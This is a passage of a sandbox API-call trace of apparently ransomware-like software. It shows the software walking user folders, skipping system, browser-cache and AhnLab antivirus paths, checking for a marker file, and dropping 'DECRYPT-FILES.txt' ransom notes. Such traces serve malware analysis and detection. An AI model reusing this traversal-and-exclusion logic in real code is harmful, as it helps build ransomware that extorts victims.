lpSrch="\\AppData\\Local") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="AhnLab") returned 0x0 [0186.688] StrStrW (lpFirst="C:\\Users\\Default\\Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.688] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0186.688] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.688] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Pictures\\\\0a16c9.tmp") returned 37 [0186.688] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.688] GetLastError () returned 0x5 [0186.688] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0186.688] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.688] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Pictures\\\\DECRYPT-FILES.txt") returned 44 [0186.688] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.688] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0186.688] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0186.688] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.689] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.689] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.689] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.689] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.689] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0dad500, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0dad500, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0dad500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.689] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.689] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.689] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.689] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.689] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.689] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.689] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.689] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.689] CloseHandle (hObject=0xffffffff) returned 0 [0186.689] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0186.689] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0186.689] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0186.689] lstrcatW (in: lpString1="PrintHood", lpString2="\\" | out: lpString1="PrintHood\\") returned="PrintHood\\" [0186.689] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\Program Files") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch=":\\Windows") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\Games\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\All Users") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.689] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="AhnLab") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\PrintHood\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.690] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0186.690] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.690] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\PrintHood\\\\0a16c9.tmp") returned 38 [0186.690] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\printhood\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.690] GetLastError () returned 0x5 [0186.690] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0186.690] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.690] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\PrintHood\\\\DECRYPT-FILES.txt") returned 45 [0186.690] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\printhood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.690] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0186.690] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*") returned="C:\\Users\\Default\\PrintHood\\*" [0186.690] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.690] CloseHandle (hObject=0xffffffff) returned 0 [0186.690] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0186.690] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0186.690] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0186.690] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0186.690] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.690] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\All Users") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="AhnLab") returned 0x0 [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.691] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0186.691] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.691] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Recent\\\\0a16c9.tmp") returned 35 [0186.691] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\recent\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.691] GetLastError () returned 0x5 [0186.691] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0186.691] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.691] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Recent\\\\DECRYPT-FILES.txt") returned 42 [0186.691] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.691] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0186.691] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Recent\\*") returned="C:\\Users\\Default\\Recent\\*" [0186.691] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Recent\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.691] CloseHandle (hObject=0xffffffff) returned 0 [0186.691] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0186.691] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0186.691] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0186.691] lstrcatW (in: lpString1="Saved Games", lpString2="\\" | out: lpString1="Saved Games\\") returned="Saved Games\\" [0186.691] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Saved Games\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0186.691] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\Program Files") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch=":\\Windows") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\Games\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\All Users") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="AhnLab") returned 0x0 [0186.692] StrStrW (lpFirst="C:\\Users\\Default\\Saved Games\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.692] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0186.692] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.692] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Saved Games\\\\0a16c9.tmp") returned 40 [0186.692] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\saved games\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.692] GetLastError () returned 0x5 [0186.692] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0186.692] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.692] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Saved Games\\\\DECRYPT-FILES.txt") returned 47 [0186.692] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\saved games\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.692] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0186.692] lstrcatW (in: lpString1="C:\\Users\\Default\\Saved Games\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Saved Games\\*") returned="C:\\Users\\Default\\Saved Games\\*" [0186.692] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.693] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.693] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f50420, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.693] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.693] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.693] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.693] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.693] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.693] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.693] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd894d74c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.693] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.693] CloseHandle (hObject=0xffffffff) returned 0 [0186.693] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0186.693] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0186.693] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0186.693] lstrcatW (in: lpString1="Searches", lpString2="\\" | out: lpString1="Searches\\") returned="Searches\\" [0186.693] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\Program Files") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch=":\\Windows") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\Games\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\All Users") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.693] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="AhnLab") returned 0x0 [0186.694] StrStrW (lpFirst="C:\\Users\\Default\\Searches\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.694] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0186.694] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.694] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Searches\\\\0a16c9.tmp") returned 37 [0186.694] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\searches\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.700] GetLastError () returned 0x5 [0186.700] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0186.700] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.700] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Searches\\\\DECRYPT-FILES.txt") returned 44 [0186.700] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\searches\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.701] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0186.701] lstrcatW (in: lpString1="C:\\Users\\Default\\Searches\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Searches\\*") returned="C:\\Users\\Default\\Searches\\*" [0186.701] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Searches\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0f50420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f50420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.702] FindNextFileW (in: hFindFile=0x479878, 